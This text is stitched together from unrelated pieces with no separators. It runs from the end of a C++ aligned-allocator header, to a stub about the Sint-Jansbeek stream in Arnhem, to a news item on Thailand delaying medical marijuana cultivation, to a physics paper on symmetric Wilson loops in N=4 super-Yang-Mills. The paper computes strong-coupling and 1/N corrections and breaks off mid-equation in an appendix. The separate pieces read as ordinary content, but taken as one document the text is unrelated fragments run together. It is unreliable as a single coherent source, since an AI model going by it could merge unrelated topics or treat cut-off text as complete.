LOG0 << "aligned_dealloc<" << Alignment << ">(), ptr = " << ptr << ", buffer = " << static_cast<void*>(buffer); base_.deallocate(buffer, alloc_size); } /******************************************************************************/ // default aligned allocation methods static inline void * aligned_alloc(size_t size, size_t meta_info_size = 0) { return AlignedAllocator<>().allocate_bytes(size, meta_info_size); } static inline void aligned_dealloc(void* ptr, size_t size, size_t meta_info_size = 0) { return AlignedAllocator<>().deallocate_bytes(ptr, size, meta_info_size); } } // namespace mem } // namespace thrill #endif // !THRILL_MEM_ALIGNED_ALLOCATOR_HEADER /******************************************************************************/
Sint-Jansbeek The Sint-Jansbeek () is a stream in Arnhem, which streams down from the hills of Zijpendaal through the Sonsbeek park and the inner city of Arnhem to the river Rhine. The Sint-Jansbeek has always been an open stream, but the part in the inner city is covered since the city moats were filled in the 19th century. The stream from the source in Zijpendaal through the park Sonsbeek is still open. Category:Arnhem Category:Rivers of Gelderland Category:Rivers of the Netherlands
Health Ministry Postpones Pot Farm Plan The Public Health Ministry has postponed growing marijuana for medical and research purposes due to a delay in the paperwork required to allow two universities to legally grow marijuana in the Northeast. The farming is now expected to begin next week or early next month. Rajamangala University of Technology Isan’s (RMUTI) Sakon Nakhon campus and Kasetsart University’s Chaloem Phrakiat campus in Sakon Nakhon were yesterday due to begin growing marijuana to supply the Phra Achan Fan Acharo Hospital in the same province to produce medical cannabis, said Dr Marut Chirasetthasiri, director-general of the Department of Thai Traditional and Alternative Medicine (DTTAM), on Tuesday. Dr Marut said that because more documents were still required to be submitted before the marijuana cultivation could begin, the beginning of this particular plan would have to be postponed. As for Daycha Siripatra, a Thai folk medicine practitioner and president of the Khaokwan Foundation, a medical cannabis advocacy group, his professional certification is still pending until the new regulations on folk medicine certifications are issued, according to Dr Marut.
--- bibliography: - 'refs.bib' --- `NORDITA-2016-105`\ `UUITP-26/16`\ **Symmetric Wilson Loops beyond leading order** *Nordita, KTH Royal Institute of Technology and Stockholm University, Roslagstullsbacken 23, SE-106 91 Stockholm, Sweden*\ *Department of Physics and Astronomy, Uppsala University\ SE-751 08 Uppsala, Sweden*\ `xinyic@nordita.org` **Abstract** We study the circular Wilson loop in the symmetric representation of $U(N)$ in $\mathcal{N} = 4$ super-Yang-Mills (SYM). In the large $N$ limit, we computed the exponentially-suppressed corrections for strong coupling, which suggests non-perturbative physics in the dual holographic theory. We also computed the next-to-leading order term in $1/N$, and the result matches with the exact result from the $k$-fundamental representation. Introduction ============ The partition function of $\mathcal{N} = 4$ SYM on $S^4$ reduces to a random matrix model with Gaussian unitary ensemble [@Erickson:2000af; @Drukker:2000rr; @Pestun:2007rz]. This fact allows exact computation of expectation values of supersymmetric observables, such as circular Wilson loops in various representations of the gauge group $U(N)$ [@Fiol:2013hna]. Motivated by the AdS/CFT correspondence, the regime of interest is when $N$ is large and the ’t Hooft coupling, $\lambda = g_\text{YM}^2 N$, is strong. For the Wilson loops in $k$-symmetric/anti-symmetric representations, which can be mapped to a system of free bosons/fermions [@Hartnoll:2006is], the leading order results matched neatly with their holographic picture, that is, a D3-brane/D5-brane carrying an amount $k$ of the fundamental string charge [@Gomis:2006sb; @Gomis:2006im; @Yamaguchi:2006tq]. We recommend [@Zarembo:2016bbk] for a review. Concerning the next-to-leading order in strong coupling, [@Horikoshi:2016hds] computed it recently for the anti-symmetric case, by using the Sommerfeld expansion of the Fermi distribution. However, the derivation for the symmetric case was precluded by the onset of Bose-Einstein condensation. One of our goals here is precisely to compute these subleading corrections in strong coupling for the symmetric case. The other goal is to compute the next-to-leading order in $1/N$, in order to shed some light on a longstanding discrepancy. That is, the non-planar result in [@Faraggi:2014tna] was computed as the correction to the saddle-point that was found by analytic continuation done in [@Hartnoll:2006is]. This did not match with the holographic solution derived in [@Buchbinder:2014nia], which used the spectrum obtained in [@Faraggi:2011bb]. In the field theory side, we can say that the path of the saddle was unclear. Therefore, we will avoid analytic continuation, and instead, we will do an honest matrix model computation from scratch, as we did for the $\mathcal{N} = 2^*$ SYM in [@Chen-Lin:2015dfa]. Nonetheless, we do expect the non-planar result for the $k$-symmetric representation to match with the $k$-fundamental representation, since Wilson loops in these two representations differ by exponentially-suppressed terms in strong coupling, as shown in [@Yamaguchi:2007ps]. Wilson loops ============ A Wilson loop, in the representation $\mathcal{R}$ of the gauge group, $U(N)$ in our case, is defined as the expectation value of the character of the representation, i.e. $$\label{wilsonLoopDef} W = \, \left\langle \chi_\mathcal{R} \right\rangle, \quad \chi_\mathcal{R} = \text{tr}_{\mathcal{R}} U,$$ where $U$ is a path-ordered exponential of the gauge connection $A_\mu$, transported along a close contour $C$: $$U = \mathop{\mathrm{P}}\exp \left[ \oint_C ds\, \left( i\dot{x}^\mu A_\mu +|\dot{x}|\Phi \right) \right].$$ Here we also have the coupling to one of the scalar fields $\Phi$ of $\mathcal{N} = 4$ SYM, in order to make the Wilson loop locally supersymmetric. For $\mathcal{N} = 4$ SYM on $S^4$, the supersymmetric localization technique [@Pestun:2007rz] is applicable to such Wilson loops whose contour lies on the equator of the 4-sphere [^1]. In the Euclidean signature, the partition function reduces to a Gaussian matrix model integral: $$\label{partitionFunctionGaussian} Z=\int d^N a \; \prod_{i<j}^N (a_i - a_j)^2 \; e^{-\frac{2 N}{\lambda} \sum_{k=1}^N a_k^2 },$$ where the integration variables are the eigenvalues of the vev of the scalar field $\Phi$, i.e. $$\left\langle \Phi \right\rangle =\text{diag}(a_1, \ldots, a_N).$$ Symmetric representation {#sec:WLsym} ------------------------ Our focus will be on Wilson loops in the $k$-symmetric representation, with the Young diagram $$\ytableausetup{mathmode, smalltableaux, centertableaux} \mathcal{R}= \overbrace{ \begin{ytableau} ~ & ~ &~ & ~ &\\ \end{ytableau}}^{k}$$ where $k \sim N $, and we will take $N \rightarrow \infty$, so that the ratio $ f\equiv k/N$ is kept fixed. Let us depart from the (Weyl) character formula for the symmetric case, derived in the appendix \[sec:proofCharacter\], which is $$\label{characterFormula} \chi_k = \sum_{i = 1}^N e^{k a_i} \prod_{j \neq i}^N \dfrac{1}{1-e^{a_j-a_i}}.$$ Due to the exponential weight, the main contribution comes from the largest eigenvalue $a_N$ [^2]: $$\label{characterFormula1} \chi_k \approx e^{k a_N} \prod_{j = 1}^{N-1} \dfrac{1}{1-e^{a_j-a_N}}.$$ Furthermore, in the strong coupling limit, the product in is exponentially small in $\lambda$, so that the character reduces to the one of the k-wrapped fundamental representation $$\label{characterFormulakWrapped} \chi_k \approx e^{k a_N},$$ in agreement with the conclusion of [@Yamaguchi:2007ps]. Let us write the Wilson loop expectation value with more explicitly as: $$\label{WilsonLoopSym} W = \dfrac{1}{Z} \int d^{N} a \; e^{-N^2 S}, \quad S = S_0 + \frac{1}{N} S_1,$$ where [^3] $$\begin{aligned} S_0 &=& \dfrac{2}{\lambda} \dfrac{1}{N} \sum_{i=1}^{N-1} a_i^2 - \dfrac{1}{N^2} \sum_{i}^{N-1} \sum_{j\neq i}^{N-1} \text{Re} \left[\log(a_j-a_i)\right]\\ S_1 &=& \dfrac{2}{\lambda } a_N^2 -\frac{2}{N} \sum _{i=1}^{N-1} \log \left(a_N-a_i\right)- f a_N + \frac{1}{N}\sum _{j=1}^{N-1} \log \left(1-e^{a_j-a_N}\right), \quad f\equiv\frac{k}{N}.\end{aligned}$$ Since $N$ is large, we will use the saddle-point method to solve , which yields $$\log W \approx - N \left( \mathcal{F}_0 + \frac{1}{N} \mathcal{F}_1 \right),$$ and $\mathcal{F} = \mathcal{F}_0 +\mathcal{F}_1/N $ is the free energy. Saddle-point equations ---------------------- Let us use the continuous approximation (for all the eigenvalues except the largest), by introducing the density function: $$\rho(x)=\frac{1}{N} \sum_{i=1}^{N-1} \delta(x-a_i).$$ Note that the normalization condition in this case is: $$\begin{aligned} \int_{-c}^c dx \, \rho(x) = 1 - \frac{1}{N},\end{aligned}$$ implying $$\label{normalizationConditions} \int_{-c}^c dx \,\rho_0(x) = 1 \quad \text{and} \quad \int_{-c}^c dx \, \rho_1(x) = -1,$$ if the density is expanded as $\rho = \rho_0 + \rho_1/N$. Let us also call $A\equiv a_N$. Then, the leading order equations in $N$ are: $$\begin{aligned} \strokedint_{-c}^c dy \, \frac{\rho_0 (y)}{x-y} & = & \frac{2 x}{\lambda} \label{saddlePointEq1} \\ \strokedint_{-c}^c dy \, \frac{\rho_0 (y)}{A-y} & = & \frac{2 A}{\lambda }-\frac{f}{2}+\frac{1}{2} \int_{-c}^c dy \, \frac{\rho_0(y)}{e^{A-y}-1} \label{saddlePointEq2}\end{aligned}$$ and the subleading order [^4]: $$\label{saddlePointEq3} \strokedint_{-c}^c dy \, \frac{\rho_1 (y)}{x-y} = -\frac{1}{x-A}- \frac{1}{2(e^{A-x}-1)}.$$ In the appendix \[sec:computeDensity\], we show a systematic way to solve integral equations and apply it to our equations. Strong coupling correction ========================== In this section, we will work in the planar limit. We will start by reproducing the Drukker-Fiol result [@Drukker:2005kx], and then compute the exponentially-suppressed corrections to it, in strong coupling. Saddle-point configuration -------------------------- The solution to the equation is the well-known Wigner semi-circle , that we copy here: $$\rho_0(x) = \frac{2 \sqrt{c^2-x^2}}{\pi c^2 }, \quad c=\sqrt{\lambda} .$$ The Bose distribution term in the equation is exponentially suppressed in strong coupling, since $A>c$. We thus neglect it for the leading order in strong coupling and, using the semi-circle distribution, it is straightforward to compute $A$, which is $$\label{solutionA} A = c \sqrt{\kappa ^2+1}, \quad \kappa =\dfrac{c\, f}{4}.$$ We plotted the saddle-point configuration in fig. \[fig:density\]. ### Correction to A The exponentially-small correction to (let us denote it by $\delta A$) actually gives higher order corrections to the action, as we shall see later on. We can compute it by expanding (with the semi-circle distribution) in $A$ [^5] : $$\int_{-c}^c dy \,\frac{\rho_0 (y)}{e^{A-y}-1} =f-\frac{4 \sqrt{\left(A+\delta A\right)^2-c^2}}{c^2}.$$ Using the geometric sum identity $$\frac{1}{e^{A-y}-1} = \sum _{m=1}^{\infty } e^{-(A-y)m},$$ then, commuting the integration and the sum, and integrating term by term, we end up with the following identity (the series is convergent for $A{\geqslant}c$): $$\label{thermalIntegral} \int_{-c}^c dy \,\frac{\rho_0 (y)}{e^{A-y}-1} = 2 \sum_{m=1}^{\infty } \frac{e^{-A \, m}}{c \, m} I_1(c \, m),$$ where $I_1(z)$ is the modified Bessel function. In the strong coupling limit, $$2 \sum_{m=1}^{\infty } \frac{e^{-A \, m}}{c \, m} I_1(c \, m) \approx \frac{2 }{\sqrt{2 \pi } c^{3/2}} e^{-(A-c)},$$ and we obtain the leading order correction to : $$\label{deltaA} \delta A = - \sqrt{\frac{c \, \kappa^2}{8 \pi \left(\kappa ^2+1\right)}} e^{-c \left(\sqrt{\kappa ^2+1}-1\right)}.$$ The leading order result ------------------------ The first contribution to the free energy comes from the $1/N$ term in the large $N$ expansion of the action , since $S_0[\rho_0]$ is canceled by the partition function whose saddle-point distribution is $\rho_0$, hence $$\mathcal{F}_0 = S_1[\rho _0] - \left[ \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)}\right]_{x=c},$$ where (see the appendix \[sec:action\]) $$\begin{aligned} S_1[\rho _0] &=& \frac{2 A^2}{c^2} - 2 \int_{-c}^c dy \, \rho_0(y) \log(A-y) - f A \\ \left[ \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)}\right]_{x=c} &=& 2 - 2 \strokedint_{-c}^c dy \, \rho_0(y) \log(c-y).\end{aligned}$$ Here, we just dropped the last term in (let us call it the Bose term), since it is subleading in strong coupling. We will come back to it in the next subsection. The integrals can be done using the semi-circle distribution , and the results are shown in the appendix \[sec:integrals\]. In order to consider how corrections to $A$ contribute to the free energy, we expand the free energy result for small $\delta A$, and we arrive to [^6] $$\label{F0withdeltaA} \mathcal{F}_0 = - 2 \left(\kappa \sqrt{\kappa ^2+1} +\sinh ^{-1}(\kappa )-\frac{2 \sqrt{\kappa ^2+1}}{c^2 \kappa} \delta A^2 \right),$$ which is the well-known result derived by Drukker and Fiol [@Drukker:2005kx] when we drop the subleading $\delta A$ term: $$\label{drukkerFiolResult} \mathcal{F}_0 = - 2 \left(\kappa \sqrt{\kappa ^2+1} +\sinh ^{-1}(\kappa) \right).$$ Our next step is to take into account the ignored Bose term in the action, as in . Strong-coupling expansion ------------------------- The strategy to compute the Bose term is to integrate the result over $A$, which gives $$\label{identityGeometricSum} \int_{-c}^c dy \,\rho_0 (y) \log \left(1-e^{y-A}\right) = - 2 \sum_{m=1}^{\infty } \frac{e^{-A m}}{c \, m^2} I_1(c \, m), \quad A{\geqslant}c$$ where the integration constant is zero, fixed by taking $A$ to infinity. This term, which is an identity, plus the $\delta A$ term in constitute the corrections to the Drukker-Fiol solution in the planar limit. In principle, for large $\lambda$, terms of any order can be generated. Let us derive the first few corrections, by expanding in strong coupling. First, the leading contribution comes from the first term of the sum, and then, we expand the modified Bessel function: $$\begin{aligned} \int_{-c}^c dy \,\rho_0 (y) \log \left(1-e^{y-A}\right) & \approx & - \frac{2\,e^{-A} I_1(c) }{c} \\ & \approx & -\frac{2}{c \sqrt{2 \pi c} }e^{-(A-c)}\left(1-\frac{3}{8 c}-\frac{15}{128 c^2}+ \dots \right).\end{aligned}$$ The last expansion in the parenthesis can actually be written in a compact way up to $O(c^{-n})$ [^7]: $$\int_{-c}^c dy \,\rho_0 (y) \log \left(1-e^{y-A}\right) = -\frac{2}{c \sqrt{2 \pi c} }e^{-(A-c)} \left( -\frac{\Gamma \left(n-\frac{1}{2}\right) \Gamma \left(n+\frac{3}{2}\right) \, _2F_2\left(1,-n;-n-\frac{1}{2},\frac{3}{2}-n;-2 c\right)} {\pi (2 c)^n \Gamma (n+1)} \right).$$ Replacing $A$ by and $c=\sqrt{\lambda}$, the free energy with the leading exponential corrections is $$\label{solutionExpansion} \boxed{ \mathcal{F}_0 = - 2 \left(\kappa \sqrt{\kappa ^2+1} +\sinh ^{-1}(\kappa ) -\sqrt{\frac{2}{\pi}} \frac{e^{-\sqrt{\lambda} \, (\sqrt{\kappa ^2+1}-1)} }{\lambda^{3/4} }\left[ 1-\frac{3}{8 \sqrt{\lambda}}-\frac{15}{128 \lambda}+ O\left(\lambda^{-3/2}\right) \right] \right). }$$ Non-planar correction ===================== In this section, we will work in the strong coupling limit. We will compute the next-to-leading order free energy in large $N$, i.e. $\mathcal{F}_1$. In principle, there are three potential sources: the large $N$ expansion of the action, the fluctuations around the saddle-point configuration, and the $SU(N)$ correction. For the latter, we will discuss it separately in the appendix \[sec:SUN\]. Action ------ Let us start with the contribution from the action, which is the $1/N^2$ term in , i.e. $$\mathcal{F}_{1, \,S} = \frac{1}{2} \int_{-c}^c \, dx\, \rho_1(x) \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} - \frac{1}{2} \left[\int_{-c}^c \, dy\, \rho_1(y) \frac{\delta^2 S_0\left[\rho _0\right]}{\delta \rho (x) \delta \rho (y)} + \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} \right]_{x=0}$$ where the functional derivatives are explicit in the appendix \[sec:action\]. The first integral is the same as the integral , and the second term is $$\frac{1}{2} \left[\int_{-c}^c \, dy\, \rho_1(y) \frac{\delta^2 S_0\left[\rho _0\right]}{\delta \rho (x) \delta \rho (y)} + \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} \right]_{x=0} = \log \left(\frac{\sqrt{A+c}-\sqrt{A-c}}{\sqrt{A-c}+\sqrt{A+c}}\right) . $$ Then, replacing $A$ by , we get $$\label{contribAction} \mathcal{F}_{1,\, S} = - \log \left(\frac{\left(\sqrt{\kappa ^2+1}-\kappa \right) \sqrt{2 \kappa \left(\sqrt{\kappa ^2+1}+\kappa \right)+1}}{2 c \kappa ^2}\right).$$ Determinant ----------- The saddle-point method gives also the contribution of the quadratic fluctuations around the saddle-point configuration, which is a Gaussian integral that can be integrated: $$\int _{-\infty }^{\infty } d^N a \, e^{-N^2 S} \approx e^{-N^2 S_*} \sqrt{ \frac{(2 \pi )^N}{ N^{2N}\, \text{det} \left( S_*'' \right) } } .$$ Here we formally denoted the Hessian matrix of the action as $S''$, and the subindex $*$ indicates evaluation at the saddle-point configuration. We will skip this latter notation though, for simplicity. This correction to the partition function must be taken into account as well (see ), whence the contribution to the free energy is $$\mathcal{F}_{1,\,\text{det}} = -\frac{1}{2} \log \left( \frac{\text{det} \left( S_Z'' \right)}{\text{det} \left( S'' \right)} \right).$$ The second derivatives of the action are shown in the appendix \[sec:action\]. We will drop the terms with the exponential, since they are subleading in strong-coupling and we are not interested in this now [^8]. Notice first that the cross derivatives are of higher order in $1/N$, which allows us to approximate the full determinant using expansion by minors as below: $$\text{det} (S'') \approx \frac{\partial ^2S}{\partial a_N^2} \text{det} \left(\frac{\partial ^2S}{\partial a_i \partial a_j}\right), \quad i,j \neq N.$$ The contribution from the minor is independent of the scaling parameter $\kappa$, and its diagonal elements are actually vanishing, due to the saddle-point equation: $$\frac{\partial S}{\partial a_k} = 0 \quad \Rightarrow \quad \frac{\partial^2 S}{\partial a_k^2} = 0, \quad k\neq N,$$ since the derivative and the finite sum commutes. When $k=N$, we can solve the second derivative by going to the continuous limit (recall $A=a_N$): $$\begin{aligned} \frac{\partial ^2S}{\partial A^2} & = & \frac{4}{c^2 N}+ \frac{2 }{N} \int_{-c}^c \frac{\rho _0(y)}{(A-y)^2} \, dy\\ & = & \frac{1}{c^2 N } \frac{4\sqrt{\kappa ^2+1}}{\kappa }.\end{aligned}$$ We do not know how to compute the determinant of the minor, neither the determinant from $S_z''$ (which is the same as the minor but one dimension higher), but the dimension analysis suggests their scaling as $$\text{det} \left(\frac{\partial ^2S}{\partial a_i \partial a_j}\right) \sim \left(\frac{1}{c^2 N}\right)^{N-1}, \quad \text{det} S_Z'' \sim \left(\frac{1}{c^2 N}\right)^{N}.$$ Hence, we conclude that the contribution to the Wilson loop is $$\label{contribDeterminant} \mathcal{F}_{1,\, \text{det}} = \frac{1}{2} \log \left(\frac{4\sqrt{\kappa ^2+1}}{\kappa }\right)+ constant,$$ where *constant* is not a function of the scaling parameter $\kappa$. Solution -------- Summing the contributions and , the subleading order free energy is $$\label{solution1overN} \boxed{ \mathcal{F}_{1} = \frac{1}{2} \log \left(\kappa ^3 \sqrt{\kappa ^2+1}\right) +\log (4\, \sqrt{\lambda})+constant. }$$ In order to match this with the exact result from the matrix model computation for the $k$-fundamental representation [@Kawamoto:2008gp]: $$\label{kfundSol} \mathcal{F}_{1,\, \square^k} = \frac{1}{2} \log \left(\kappa ^3 \sqrt{\kappa ^2+1}\right),$$ we see that *constant* must cancel $\log(4\, \sqrt{\lambda})$. This is consistent, since we neglected the Bose term, meaning we are indeed using the character formula for the $k$-fundamental case . Conclusion ========== In this paper we used the saddle-point method to compute strong-coupling and non-planar corrections to the leading order solution for the Wilson loop in the symmetric representation. The strong-coupling corrections come from the Bose statistic term in the character formula , which is the only term that distinguishes the Wilson loops in the $k$-symmetric representation from the $k$-fundamental representation. We expanded it using geometric series, and for strong coupling, it gives an infinite series of exponentials of negative coupling, where each of these terms has also a power series in $1/\sqrt{\lambda}$. The first leading exponential term is explicitly shown in , which agrees with the estimate done in [@Yamaguchi:2007ps]. The latter also provided a world-volume interpretation as a disk open string attached to the D-brane. It would certainly be interesting to understand further these non-perturbative corrections in future works. We would like to comment as well that the fundamental representation also contains non-perturbative corrections [@Drukker:2006ga], when expanding the exact planar result [@Erickson:2000af] for strong coupling: $$W_\text{fund} = \frac{2}{\sqrt{\lambda}}I_1(\sqrt{\lambda}) \sim e^{\sqrt{\lambda}} + e^{-\sqrt{\lambda}}.$$ This is, however, for the Wilson loop, not for the log of the Wilson loop as in our case. The second goal of the paper was to solve the next-to-leading order term in $1/N$, while remaining at the strong coupling limit. Up to a constant term that we were unable to compute, our solution agreed perfectly with the exact $k$-fundamental representation result, which depends only on the scaling parameter $\kappa = k \sqrt{\lambda} /(4 \, N) $. It is consistent from the matrix model side. However, matching with the holographic dual remains an open question, since the result from the one-loop partition function for the D3-brane computed in [@Buchbinder:2014nia] is $$\label{d31loop} \mathcal{F}_{1,\,\text{D3}} = \frac{1}{2} \log \left(\frac{\kappa ^3}{\sqrt{\kappa ^2+1}}\right).$$ It coincides with the matrix model solution only in the limit $\kappa << 1$, as discussed in [@Buchbinder:2014nia]. One can also point out corrections from $SU(N)$. Indeed, at the non-planar limit, the traceless condition from $SU(N)$ adds an extra $1/N$ term to the density (see the appendix \[sec:SUN\]). Nonetheless, this does not help solve the mismatch problem. The D3-brane computation should probably be revisited with a better understanding of the D-brane backreaction. Acknowledgements {#acknowledgements .unnumbered} ---------------- We would like to thank K. Zarembo for useful discussions. This work was supported by the Marie Curie network GATIS of the European Union’s FP7 Programme under REA Grant Agreement No 317089, by the ERC advanced grant No 341222 and by the Swedish Research Council (VR) grant 2013-4329. Weyl character formula for the symmetric representation {#sec:proofCharacter} ======================================================= Given the generating function $G(\alpha)$, we can derive the character $\chi_k$, i.e. $$G(\alpha) = \sum_k \, e^{\alpha \, k} \chi_k \quad \Rightarrow \quad \chi_k =\int_{C - i \pi}^{C+i \pi} \frac{d\alpha}{2 \pi i} \, e^{\alpha \, k} \, G(\alpha).$$ For the symmetric representation, $$G(\alpha) = \prod_{i=1}^N \frac{1}{1-e^{a_i-\alpha }},$$ and $C$ is larger than $a_i$ for all $i$. Assume the eigenvalue set is partially ordered, non-degenerate and finite, i.e. $\{-\infty < a_1<\ldots<a_N < \infty\}$. Then, we can deform the integration contour to encircle all the eigenvalues, as shown in fig. \[fig:circuit\], and use the residue theorem. The contours $C_1$ and $C_2$ cancel each other, and $C_3$ is vanishing. Since the eigenvalues are non-degenerate, they are all single poles, and we obtain . Compute the eigenvalue density {#sec:computeDensity} ============================== Consider the integral equation $$\strokedint_a^b dy \, \dfrac{\rho(x)}{x-y} = F(x).$$ Its solution[^9] is given by $$\label{generalSolution} \rho(x) = \strokedint_a^b \dfrac{dy}{2 \pi} \dfrac{F(y)}{x-y}\sqrt{\dfrac{(b-x)(x-a)}{(b-y)(y-a)}}$$ with the conditions $$\begin{aligned} \int_a^b \dfrac{dy}{\pi} \dfrac{F(y)}{\sqrt{(b-y)(y-a)}} &=& 0 \label{endpointCondition1}\\ \int_a^b \dfrac{dy}{\pi} \dfrac{y F(y)}{\sqrt{(b-y)(y-a)}} &=& 1 \label{endpointCondition2}\end{aligned}$$ that fix the endpoints $a$ and $b$. The last condition is the normalization condition for the eigenvalue density $\rho(x)$. We solve the system of , and perturbatively in $1/N$. Hence, consider $$F = F_a + \frac{1}{N} F_b, \quad a = a_0 + \frac{1}{N} a_1, \quad b = b_0 + \frac{1}{N} b_1,$$ where, for the case at hand, $$F_a(x) = \frac{2}{\lambda } x, \quad F_b(x) = -\dfrac{1}{ x - A}+\xi.$$ Using $F_a$ only, can be solved straightforwardly by the residue theorem, and the result is $$\rho_a(x) = \frac{2 \sqrt{(x-a) (b-x)}}{\pi \lambda }.$$ Solving and at the leading order in $N$ gives $$c \equiv \sqrt{\lambda} = b_0 = -a_0.$$ Expanding $\rho_a$, we get the leading order for the density, and a subleading order term: $$\rho_a(x) = \frac{2 \sqrt{c^2-x^2}}{\pi c^2 } + \dfrac{1}{N} \dfrac{c \, (b_1 - a_1) + x\, (a_1 + b_1 )}{2 \sqrt{c^2 - x^2}}.$$ The next-to-leading order correction to the endpoints are computed using $F_b$ in and , which reduce to $$\begin{aligned} a_1 + b_1 & = & -\frac{c^2}{\sqrt{A^2-c^2}}-c^2\xi \\ b_1 - a_1 & = & -\frac{c\, A }{\sqrt{A^2-c^2}}.\end{aligned}$$ Then, the $1/N$ correction to $\rho_a$ becomes $$\rho_{a, 1}(x) = -\frac{A+x}{\pi \sqrt{\left(A^2-c^2\right) \left(c^2-x^2\right)}} -\frac{x \, \xi}{\pi \sqrt{c^2-x^2}}$$ We still need to consider the $F_b$ contribution in , which gives another $1/N$ correction to the density, that is: $$\rho_{b, 1}(x) = \frac{\sqrt{c^2-x^2}}{\pi (A-x) \sqrt{A^2-c^2} }.$$ The $1/N$ correction to the density is then the sum of $\rho_{a, 1}$ and $\rho_{b, 1}$. Solution {#sec:solutionRho} -------- In conclusion, we have computed up to the subleading order in $1/N$ for the eigenvalue density. In order to fix the notation, let us denote $\rho = \rho_0 + (\rho_1 + \rho_{1,\xi} ) / N $, where $$\begin{aligned} \rho_0(x) & = & \frac{2 \sqrt{c^2-x^2}}{\pi c^2 } \label{semicircle}\\ \rho_1(x) & = & - \dfrac{\sqrt{A^2-c^2}}{\pi (A-x) \sqrt{c^2-x^2}} \label{solutionRho1}\\ \rho_{1,\xi}(x) & = & - \frac{x \, \xi}{\pi \sqrt{c^2-x^2}} \label{solutionRhoXi}\end{aligned}$$ and $c=\sqrt{\lambda}$. When $\xi=0$, which corresponds to the $U(N)$ case, our solution is in agreement with the result obtained in [@Kawamoto:2008gp], where the resolvent method was used. If we consider $SU(N)$ instead, the traceless condition fixes the value of $\xi$: $$\label{solutionXi} \sum_{i=1}^N a_i = 0 \quad \Rightarrow \quad N \int_{-c}^c dx \,x\, \rho(x) + A = 0 \quad \Rightarrow \quad \xi = \frac{2 \sqrt{A^2-c^2}}{c^2}.$$ Large N expansion for the action {#sec:expandAction} ================================ Given the action $S=S_0+S_1/N$, let us expand it around $\rho = \rho_0+\rho_1/N$: $$\begin{aligned} \label{generalActionExpansion} S\left[\rho_0 + \frac{1}{N} \, \rho_1\right] &=& S_0[\rho _0]+ \frac{1}{N}\,S_1[\rho _0] \nonumber\\ & & + \frac{1}{N} \int_{-c}^c \, dx\, \rho _1(x) \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)} + \frac{1}{N^2} \int_{-c}^c \, dx\, \rho _1(x) \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} \nonumber\\ & & + \frac{1}{2 N^2} \int_{-c}^c \int_{-c}^c \, dx\, dy\, \rho_1(x) \rho_1(y) \frac{\delta^2 S_0\left[\rho _0\right]}{\delta \rho (x) \delta \rho (y)} + \, O(N^{-3}). \end{aligned}$$ Using integration by parts, the equation of motion for $S_0$ $$0 = \frac{d}{dx}\frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)},$$ the identity $$\left[ \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)}\right]_{x=-c} = \left[ \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)}\right]_{x=c},$$ which is a consequence of $\rho_0(x)=\rho_0(-x)$, and the normalization condition for $\rho_1$ in , we obtain $$\int_{-c}^c \, dx\, \rho _1(x) \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)} = - \left[ \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)}\right]_{x=c}$$ For the second derivative term, we also use the equation of motion for $S$, $$0 = \frac{d}{dx}\frac{\delta S\left[\rho\right]}{\delta \rho (x)} = \frac{d}{dx}\frac{\delta S_0\left[\rho\right]}{\delta \rho (x) } + \frac{1}{N}\, \frac{d}{dx}\frac{\delta S_1\left[\rho\right]}{\delta \rho (x)},$$ then expanding the density $\rho = \rho_0+\rho_1/N$ and integrating with $\rho_1$, we conclude that $$\int_{-c}^c \, dy\, \rho_1(y) \frac{\delta^2 S_0\left[\rho _0\right]}{\delta \rho (x) \delta \rho (y)} + \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} = \text{constant},$$ thus, we can set $x=0$ to determine the constant. Now, integrating again the above expression with $\rho_1$ yields the following equality: $$\begin{aligned} \int_{-c}^c \int_{-c}^c \, dx\, dy\, \rho_1(x) \rho_1(y) \frac{\delta^2 S_0\left[\rho _0\right]}{\delta \rho (x) \delta \rho (y)} &=& - \int_{-c}^c \, dx\, \rho_1(x) \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x) } \nonumber\\ & & - \left[\int_{-c}^c \, dy\, \rho_1(y) \frac{\delta^2 S_0\left[\rho _0\right]}{\delta \rho (x) \delta \rho (y)} + \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} \right]_{x=0} \end{aligned}$$ In conclusion, reduces to $$\begin{aligned} \label{actionExpansion} S\left[\rho_0 + \frac{1}{N} \, \rho_1\right] &=& S_0[\rho _0] + \frac{1}{N} \left( S_1[\rho _0] - \left[ \frac{\delta S_0\left[\rho _0\right]}{\delta \rho (x)}\right]_{x=c} \right) \nonumber \\ & & + \frac{1}{2 N^2} \left( \int_{-c}^c \, dx\, \rho_1(x) \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} - \left[\int_{-c}^c \, dy\, \rho_1(y) \frac{\delta^2 S_0\left[\rho _0\right]}{\delta \rho (x) \delta \rho (y)} + \frac{\delta S_1\left[\rho _0\right]}{\delta \rho (x)} \right]_{x=0} \right) \nonumber \\ & & + \, O(N^{-3}). \end{aligned}$$ Action and derivatives {#sec:action} ====================== For convenience, we write a list of the action, $S=S_0+S_1/N$, and its derivatives, for the Wilson loop in the $k$-symmetric representation of $U(N)$. Both the discrete version and the continuous approximation will be relevant for many computations in the paper. Discrete -------- $$\begin{aligned} S_0 & = & \frac{2}{\lambda N} \sum _{n=1}^{N-1} a_n^2-\frac{2}{N^2} \sum _{i=1}^{N-1} \sum _{j=i+1}^{N-1} \log \left(a_j-a_i\right)\\ S_1 & = & \frac{2 }{\lambda } a_N^2 -\frac{2}{N} \sum _{i=1}^{N-1} \log \left(a_N-a_i\right) -f a_N +\frac{1}{N}\sum_{j=1}^{N-1} \log \left(1-e^{a_j-a_N}\right)\\ \frac{\partial S}{\partial a_k} & = & \frac{4 }{\lambda N} a_k -\frac{2 }{N^2} \sum _{j\neq k}^{N} \frac{1}{a_k-a_j} + \frac{1}{N^2} \frac{1}{e^{a_N-a_k}-1} , \quad k\neq N \\ \frac{\partial S}{\partial a_N} & = & \frac{4 }{\lambda N} a_N -\frac{2}{N^2} \sum 